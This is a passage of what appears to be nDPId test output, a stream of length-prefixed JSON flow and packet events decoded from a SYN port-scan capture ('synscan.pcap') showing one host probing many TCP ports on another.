+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1390,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":38292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1390,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1380,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsffkAACoGoHmsEAAIQA2GNIzTlZTdU4MZAAAAAGACDACW9wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1391,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1391,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1381,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsyFAAADUGSyKsEAAIQA2GNIzSF9TdUoMYAAAAAGACCAAYuwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1392,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1392,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1382,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsH38AADoG7vOsEAAIQA2GNIzSAtDdUoMYAAAAAGACDAApvwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1393,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1393,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1383,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsR7gAAC0G07qsEAAIQA2GNIzSH1\/dUoMYAAAAAGACCAARMAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1394,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":146,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1394,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1384,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsglEAADIGlCGsEAAIQA2GNIzSAJLdUoMYAAAAAGACDAAr\/QAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1395,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1395,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1385,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsHb4AADcG87SsEAAIQA2GNIzSAZfdUoMYAAAAAGACEAAm+AAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1396,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1396,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1386,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsyacAADgGRsusEAAIQA2GNIzSDPvdUoMYAAAAAGACBAAnlAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1397,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1397,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1387,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsUY0AADcGv+WsEAAIQA2GNIzSYODdUoMYAAAAAGACEADHrgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1398,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1398,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1388,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsEx8AADUGAFSsEAAIQA2GNIzSHz\/dUoMYAAAAAGACCAARUAAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1399,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1399,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1389,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsi8gAACsGkaqsEAAIQA2GNIzSS5bdUoMYAAAAAGACEADc+AAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1400,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":61900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1400,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1390,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsv2QAACUGZA6sEAAIQA2GNIzS8czdUoMYAAAAAGACCAA+wgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1401,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1401,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1391,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsnmIAADoGcBCsEAAIQA2GNIzSAlHdUoMYAAAAAGACDAAqPgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1402,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1402,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1392,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAs8qkAAC8GJsmsEAAIQA2GNIzSF3LdUoMYAAAAAGACEAARHQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1403,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1310,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1403,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1393,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsv0kAACYGYymsEAAIQA2GNIzSBR7dUoMYAAAAAGACDAAncQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1404,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1404,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1394,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsRIMAACsG2O+sEAAIQA2GNIzSH0jdUoMYAAAAAGACEAAJRwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1405,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1114,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1405,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1395,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsg2UAACwGmQ2sEAAIQA2GNIzSBFrdUoMYAAAAAGACBAAwNQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1406,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1406,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1396,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsvfoAADoGUHisEAAIQA2GNIzTBC3dU4MZAAAAAGACDAAoXwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1407,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1407,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1397,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsVvEAADUGvIGsEAAIQA2GNIzTDx3dU4MZAAAAAGACCAAhbwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1408,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1408,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1398,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsc5UAACcGrd2sEAAIQA2GNIzTF3ndU4MZAAAAAGACEAAREwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1409,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4242,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1399,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsjGAAACYGlhKsEAAIQA2GNIzTEJLdU4MZAAAAAGACDAAb+gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1410,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3370,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1410,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1400,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAs2QcAAC8GQGusEAAIQA2GNIzTDSrdU4MZAAAAAGACEAAbYgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1411,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1411,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1401,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAspzIAACYGe0CsEAAIQA2GNIzTH0HdU4MZAAAAAGACDAANSwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1412,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49153,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1412,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1402,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsVwYAADgGuWysEAAIQA2GNIzTwAHdU4MZAAAAAGACBAB0igAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1413,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1413,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1403,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsctcAACcGrpusEAAIQA2GNIzTAtLdU4MZAAAAAGACEAAlugAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1414,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":513,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 